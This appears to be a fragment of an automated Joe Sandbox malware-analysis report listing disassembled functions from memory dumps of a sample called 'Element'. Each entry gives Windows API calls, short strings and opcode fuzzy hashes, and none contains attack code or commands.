                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: LongWindow$InvalidateMessageRectSend
                    • String ID:
                    • API String ID: 3340791633-0
                    • Opcode ID: 8534e56cbfa9c923cdf90f1edd83f1c731ffea0719ea79c7905dbe4df23172ef
                    • Instruction ID: 651122373a476b440c3a55ab3ab9f70492e9a01a1e5f3ad7018b6ff7a0a8eff4
                    • Opcode Fuzzy Hash: 8534e56cbfa9c923cdf90f1edd83f1c731ffea0719ea79c7905dbe4df23172ef
                    • Instruction Fuzzy Hash: 30419E31A4869686FB649F25CC443BA7755AB90F92F5841B2DA9D937D3CF3CEC818304
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+$Replicator::operator[]
                    • String ID:
                    • API String ID: 3863519203-0
                    • Opcode ID: 44f1c3709cd1317c873ee19be0e424430ad242c0dc88f8688211b8b9ab9eefd6
                    • Instruction ID: 9ede64d333f0494fc5199e2f2bd444d482ae1b77b917d048b37ab05abf62169f
                    • Opcode Fuzzy Hash: 44f1c3709cd1317c873ee19be0e424430ad242c0dc88f8688211b8b9ab9eefd6
                    • Instruction Fuzzy Hash: 93415973A00B84A9FB01DFA4D8683EC37B0F768B58F588415CE496775ADB78C986CB50
                    APIs
                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6C58AA02B,?,?,?,00007FF6C58A9FE6), ref: 00007FF6C58B3C41
                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6C58AA02B,?,?,?,00007FF6C58A9FE6), ref: 00007FF6C58B3CA3
                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6C58AA02B,?,?,?,00007FF6C58A9FE6), ref: 00007FF6C58B3CDD
                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6C58AA02B,?,?,?,00007FF6C58A9FE6), ref: 00007FF6C58B3D07
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                    • String ID:
                    • API String ID: 1557788787-0
                    • Opcode ID: 74fb27ec21b7c3bf82c39238e5a02448a96be849278828ef460b116f9bff67e0
                    • Instruction ID: 2cc3ad7ff610b35c1ae0e8ef006db5f715268fa579f67f8d210c1bd9d083a9be
                    • Opcode Fuzzy Hash: 74fb27ec21b7c3bf82c39238e5a02448a96be849278828ef460b116f9bff67e0
                    • Instruction Fuzzy Hash: E5218131B097A181E620AF16AC50029B6A8FB98FD1B584134DFDEA7BA5DF3CE8518300
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: shared_ptr$Concurrency::details::_Decorator::getDisplacementSchedulerScheduler::_
                    • String ID:
                    • API String ID: 1539326353-0
                    • Opcode ID: 548fff3794f8578793ba9b1f30545bb8a5417a61614bf308a57c5b7ed3b80adb
                    • Instruction ID: 5959f4fc7db3baea8d6f6e232b7739f010fada14e58145f12e89d01396c2cdbb
                    • Opcode Fuzzy Hash: 548fff3794f8578793ba9b1f30545bb8a5417a61614bf308a57c5b7ed3b80adb
                    • Instruction Fuzzy Hash: 9331F132A09B8492EA51DB16F47539FA7A1F7D5BC4F000125FA8E87B5ADF38C491CB04
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    • Opcode ID: 1a3bef3f081372c109b481b3584327cd0323210818abe567890041c97091b183
                    • Instruction ID: 5435ddbaf7748968089c180b1115591b2e94e65a7c029b86a8962079fae00532
                    • Opcode Fuzzy Hash: 1a3bef3f081372c109b481b3584327cd0323210818abe567890041c97091b183
                    • Instruction Fuzzy Hash: 00318126A08A8581EB10CF15EC983B96760FB84FD5F540172DA8D87BAACF3CD895C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    • Opcode ID: 8b43e1cc6200736644002785bf2612f5ff520a6a5f4ee2928a3ccc412ddb1b8e
                    • Instruction ID: ae82a9c8cdd8732275b2721cf7665dfd8270b12bff2ad6c1d1eb1a47638b8dee
                    • Opcode Fuzzy Hash: 8b43e1cc6200736644002785bf2612f5ff520a6a5f4ee2928a3ccc412ddb1b8e
                    • Instruction Fuzzy Hash: 45214A36A09BA286EA20DF05EC94569B764FB84F81F540171EA8D87B56DF3CE8408B00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CreateMessageObjectSendStockWindow
                    • String ID:
                    • API String ID: 3970641297-0
                    • Opcode ID: 28ab5b73c65917a7dd8a5f113cda4927fe1f4d8d92eab68f1c80210d648ebe6f
                    • Instruction ID: 1dceeda78b38ffb0001db0fa11d89ef91571a3f127aa2caa04b66ba5706cb55a
                    • Opcode Fuzzy Hash: 28ab5b73c65917a7dd8a5f113cda4927fe1f4d8d92eab68f1c80210d648ebe6f
                    • Instruction Fuzzy Hash: B32171726097C58AE7A48F15E8447AAB7A0FB88B81F440135EACD87B55DF7CE884CB00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _ctrlfp
                    • String ID:
                    • API String ID: 697997973-0
                    • Opcode ID: ceb11bdc7e533b6efe9193ca724860c089eef8b0199c88c154fa5b9cecae704e
                    • Instruction ID: 18272cc773c6eeb7618e1704c05a42879b969fff7c8f0bbaf687460b9eac2fdd
                    • Opcode Fuzzy Hash: ceb11bdc7e533b6efe9193ca724860c089eef8b0199c88c154fa5b9cecae704e
                    • Instruction Fuzzy Hash: BB11C925E0C55542D6219F3898411BBA371FF9AB85F644231F7CA9A6DADF2DE8808B00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                    • Instruction ID: 4b3d9869f7eece76ce86851b76a7a49b50555640442a8599d2794fd7335196ee
                    • Opcode Fuzzy Hash: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                    • Instruction Fuzzy Hash: 862108B6A04781DFEB00CF78D8441AC77B0F748B48B004866EE5897B19EF78D954CB40
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ErrorLast$abort
                    • String ID:
                    • API String ID: 1447195878-0
                    • Opcode ID: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                    • Instruction ID: 936d7eb6a719e4f46fc5522498e7db65334b947d6d644f0d44525e153218486b
                    • Opcode Fuzzy Hash: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                    • Instruction Fuzzy Hash: BE019E20B0B35642FA586F31AD6957D21515F84F93F948538D9DEC67D7EE2CFC004200
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: ed4cd48db317d028437d79ed32fdbf2d4d468542dcded9a22e892753fecea579
                    • Instruction ID: 3c26184ea851d72a77a14569283f76e6539d4e2415ee399a13ce6128bcc3206d
                    • Opcode Fuzzy Hash: ed4cd48db317d028437d79ed32fdbf2d4d468542dcded9a22e892753fecea579
                    • Instruction Fuzzy Hash: 5A018C31A187E182E7508F26BD087296A60BB85F95F581174DE8A43BA3CF7DE8448B40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-3916222277
                    • Opcode ID: 86150bdac83bff3d3a3978e067b000b41a5b794f2aaf96f349425064245c13ca
                    • Instruction ID: 49b807a9b407d5d889c8a04ea13a3ba9ad9a7eff985267a227cde296f4ae945f
                    • Opcode Fuzzy Hash: 86150bdac83bff3d3a3978e067b000b41a5b794f2aaf96f349425064245c13ca
                    • Instruction Fuzzy Hash: 3202BFB2605BC4A1EB75DB91E5B83EAA361F7A5BC0F409521DE8D53B59EF38C085CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: gfffffff
                    • API String ID: 3215553584-1523873471
                    • Opcode ID: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                    • Instruction ID: 63cbf447b85cc3d0980f34cba2e069e62a42ef9002e796a1b487d6842434b671
                    • Opcode Fuzzy Hash: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                    • Instruction Fuzzy Hash: 81912763A0A3DA86EB218F2599413B86B95AB25FD1F048131EBCD873D6DE3DE911C301
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: __std_exception_copy__std_exception_destroy
                    • String ID: ange
                    • API String ID: 2960854011-4159947239
                    • Opcode ID: 837e788da367ebb68e83679b17b8d887118eed0f6b5a82909e9cd0bee2846e8a
                    • Instruction ID: f01cb809863208084368c4e53e8e5500e558cacf7fb938b1a621dcb406045a18
                    • Opcode Fuzzy Hash: 837e788da367ebb68e83679b17b8d887118eed0f6b5a82909e9cd0bee2846e8a
                    • Instruction Fuzzy Hash: 6AA19372A14B8491FB00CF25E4683D9B7A1E7F97A4F109312EE9C136AAEB78D5C5C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container
                    • API String ID: 3565006973-3941886329
                    • Opcode ID: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                    • Instruction ID: 22c32f5bd244813ea9753a9208399329b77158e63d0d99ec0b5b48d2cbbfd208
                    • Opcode Fuzzy Hash: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                    • Instruction Fuzzy Hash: E9914476604B9282DB24CF29E8502AD73B1FB88F95F518026DF9E83724EF79D845C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: e+000$gfff
                    • API String ID: 3215553584-3030954782
                    • Opcode ID: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                    • Instruction ID: 64ca44b47df9ea0a3981bd7f5936915130af3d56eb78af4a7560fe1bb7c5cbe8
                    • Opcode Fuzzy Hash: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                    • Instruction Fuzzy Hash: 4C516762B1A7D246E7248F399C403696A91EB91F91F488231DBDCCBBD6CF2DD845C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: __std_exception_destroy
                    • String ID: [json.exception.
                    • API String ID: 2453523683-791563284
                    • Opcode ID: 2e22769fcecba67434e96d9d783ac0464a1c11fc42a9ad46ae3cf6b6d8bcd956
                    • Instruction ID: 31aa40b5c4a99dbd099c586fde351be7df0439f228ada15f4083e57fdc6839f3
                    • Opcode Fuzzy Hash: 2e22769fcecba67434e96d9d783ac0464a1c11fc42a9ad46ae3cf6b6d8bcd956
                    • Instruction Fuzzy Hash: AC51D132A14B80A1FB10DB24E5683DD6360E7E5B90F508611EB9C43BAAEF78C6D6C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: __std_exception_destroy
                    • String ID: at line $, column
                    • API String ID: 2453523683-191570568
                    • Opcode ID: e2e9213b78b4f48b5e10b874a45c93fabeb8d2a14b92d34ea69f29d604c5b26d
                    • Instruction ID: d02fc10042453c2346d0b13b333ba6f513a5572e60712dcfdd17471c6f47a07d
                    • Opcode Fuzzy Hash: e2e9213b78b4f48b5e10b874a45c93fabeb8d2a14b92d34ea69f29d604c5b26d
                    • Instruction Fuzzy Hash: 3341B272A14B8091FA10DB24E4653EEA360E7F5794F40A311EE98036ABEF7CC2C5C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: FileFindHeaderInstanceTargetType
                    • String ID: Bad dynamic_cast!
                    • API String ID: 746355257-2956939130
                    • Opcode ID: 63163e2199a9d6734fc46efa35c0aac2ed02f89aa03512a238a1aec24ed52471
                    • Instruction ID: 0f342e86b94525148b5a810607fd71fa8f1a13cd36259066bdf37017013fc515
                    • Opcode Fuzzy Hash: 63163e2199a9d6734fc46efa35c0aac2ed02f89aa03512a238a1aec24ed52471
                    • Instruction Fuzzy Hash: 6C419136311694B6FB64CF61E8B97EA63A0F764B85F108525DE4A03B54DB38C583CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ErrorFileLastWrite
                    • String ID: U
                    • API String ID: 442123175-4171548499
                    • Opcode ID: 30b4d7d095d87f84c7f08717494d4c8f3d56669b1d1bb515c8f0b6c2cb0432c9
                    • Instruction ID: 56195e9e2e2647eeb139766e3742f1c6d23cc572970ffc153c2815573e9bcb0c
                    • Opcode Fuzzy Hash: 30b4d7d095d87f84c7f08717494d4c8f3d56669b1d1bb515c8f0b6c2cb0432c9
                    • Instruction Fuzzy Hash: EE41B572715A8092FB609F25E8687DAB7A0F3A8794F854025EE4D87798EF3CC486C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$CreateDestroyMessageObjectSendStock
                    • String ID: static
                    • API String ID: 3467290483-2160076837
                    • Opcode ID: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                    • Instruction ID: 40e9def159f593a54971a66e44af8bea1c4ee610e73e24744303e07c0871c619
                    • Opcode Fuzzy Hash: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                    • Instruction Fuzzy Hash: 0F411E365086D2C6D6709F25E8407AFB7A5FB84B91F104235DBE947A9AEF3CD881CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _snwprintf
                    • String ID: , $$AUTOITCALLVARIABLE%d
                    • API String ID: 3988819677-2584243854
                    • Opcode ID: 32885857382379a4b4f2003679ad0bf2db11e685a1a76c32f342b704b352f53d
                    • Instruction ID: db64d5beb9a9e7b9e68d740dfe113d543afebde5703d4e360eef73cd08a79986
                    • Opcode Fuzzy Hash: 32885857382379a4b4f2003679ad0bf2db11e685a1a76c32f342b704b352f53d
                    • Instruction Fuzzy Hash: 98315C76B09B9295EB10DF64E8411EC2375BB44F85B8040B2DA9D9779ACF38E90AC340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$CreateMessageObjectSendStock
                    • String ID: $SysTabControl32
                    • API String ID: 2080134422-3143400907
                    • Opcode ID: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                    • Instruction ID: 9d2679e77b5313fcdebfc4c1dc959f30abcb59558e202d9c956aeef32bb69a5c
                    • Opcode Fuzzy Hash: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
